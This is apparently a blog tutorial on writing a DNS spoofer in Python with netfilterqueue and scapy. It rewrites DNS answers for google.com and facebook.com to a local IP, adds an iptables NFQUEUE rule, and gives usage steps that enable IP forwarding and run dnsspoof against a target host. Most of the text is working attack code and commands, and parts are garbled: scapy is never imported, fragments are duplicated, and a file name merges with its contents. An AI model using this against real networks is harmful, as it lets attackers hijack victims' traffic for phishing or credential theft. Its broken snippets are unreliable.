WRITING YOUR OWN DNS SPOOFER PROGRAM : Coding for Cyber Security Program №3.

Image for post
Image for post

1. INTERCEPTING THE REQUEST

# pip install netfilterqueue
hosts = {
b"www.google.com.": "10.0.2.15",
b"google.com.": "10.0.2.15",
b"facebook.com.": "10.0.2.15"}
import netfilterqueue
# accepting the packet
def pkt_process(packet):
print(packet)
packet.accept()

q = netfilterqueue.NetfilterQueue()
q.bind(0, pkt_process)
q.run()
import netfilterqueue
# dropping the packet
def pkt_process(packet):
print(packet)
packet.drop()
q = netfilterqueue.NetfilterQueue()
q.bind(0, pkt_process)
q.run()
# handling requests and responses
def pkt_process(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.DNSRR):
print("[Before Modification ]:", scapy_packet.summary())
try:
scapy_packet = modify_packet(scapy_packet)
except IndexError:
pass
print("[After Modification ]:", scapy_packet.summary())
packet.set_payload(bytes(scapy_packet))
packet.accept()

2. MODIFICATION OF PACKETS

# modifying the results
def modify_packet(packet):
qname = packet[scapy.DNSQR].qname
if qname not in hosts:
print("Invalid DNS Host:", qname)
return packet
packet[scapy.DNS].an = scapy.DNSRR(rrname=qname, rdata=hosts[qname])
packet[scapy.DNS].ancount = 1
# removing some fields so that scapy can recalculate them
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.UDP].len
del packet[scapy.UDP].chksum
return packet
import os
QUEUE_NUM = 123
# insert the iptables FORWARD rule
os.system("iptables -I FORWARD -j NFQUEUE --queue-num {}".format(QUEUE_NUM))
q = NetfilterQueue()
try:
q.bind(QUEUE_NUM, pkt_process)
q.run()
except KeyboardInterrupt:
os.system("iptables --flush")

USING A DNS SPOOFER :

# pip install netfilterqueue
# service apache2 start
# git clone https://github.com/An4ndita/dns-spoof
# cd dns-spoof
# mousepad dns.py
b”example.com” : “Your IP”
# python3 dns.py
Image for post
Image for post
# mousepad /etc/spoofhost.txt10.0.2.15 mail*
10.0.2.15 www*
10.0.2.15 www.example.*
10.0.2.15 *.example.com
# echo 1 > /proc/sys/net/ipv4/ip_forward (enable port forwarding)
# dnsspoof -f spoofhost.txt host 10.0.2.4 and udp port 53

Cyber Security Enthusiast

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store